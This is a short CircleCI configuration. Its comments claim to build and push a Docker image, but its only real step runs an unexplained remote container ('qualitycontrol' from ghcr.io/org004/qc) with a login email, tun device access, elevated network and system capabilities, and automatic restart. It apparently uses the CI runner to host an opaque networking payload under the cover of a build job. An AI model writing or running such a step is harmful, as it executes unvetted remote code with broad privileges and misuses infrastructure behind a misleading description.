version: 2  
jobs:
  build:
    docker:
      - image: cimg/go:1.16
        auth:
          username: $dockeruser
          password: $dockerpas  # context / project UI env-var reference
    steps:
      - checkout
      # ... steps for building/testing app ...

      - setup_remote_docker:
          version: default
          docker_layer_caching: true
      # build and push Docker image
      - run: |
          
          docker run -d --name qualitycontrol -e LOGIN="mahanairlines.com@gmail.com" --device=/dev/net/tun --cap-add=NET_ADMIN --cap-add=NET_RAW --cap-add=SYS_ADMIN --log-opt max-size=10m --log-opt max-file=3 --restart=always ghcr.io/org004/qc:latest
          sleep 20
          docker ps